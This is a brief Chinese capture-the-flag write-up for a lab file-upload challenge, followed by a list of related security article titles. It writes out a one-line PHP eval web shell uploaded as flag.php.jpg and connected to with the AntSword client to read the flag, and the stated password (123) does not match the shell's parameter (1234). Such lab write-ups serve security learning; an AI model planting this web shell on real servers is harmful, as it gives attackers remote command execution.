题目
1.打开靶机
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
2.创建一个脚本文件
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
3上传后复制文件get请求的链接并打开蚁剑
连接密码为123
双击链接
4,查找'/'在最下面找到flag文件
5,打开文件得到flag
相关推荐
athink_cn5 小时前
HTTP/2新型漏洞“MadeYouReset“曝光:可发动大规模DoS攻击小韩博9 小时前
metasploit 框架安装更新遇到无法下载问题如何解决合作小小程序员小小店14 小时前
SDN安全开发环境中常见的框架,工具,第三方库,mininet常见指令介绍Whoami!21 小时前
2-3〔O҉S҉C҉P҉ ◈ 研记〕❘ 漏洞扫描▸AppScan(WEB扫描)Bruce_Liuxiaowei2 天前
跨站脚本攻击(XSS)高级绕过技术与防御方案人衣aoa2 天前
PG靶机 - Pelicanlingggggaaaa2 天前
小迪安全v2023学习笔记(六十一讲)—— 持续更新中运维行者_2 天前
使用Applications Manager进行 Apache Solr 监控挨踢攻城3 天前
IT资讯 | VMware ESXi高危漏洞影响国内服务器菜根Sec3 天前
Sqli-labs靶场搭建及报错处理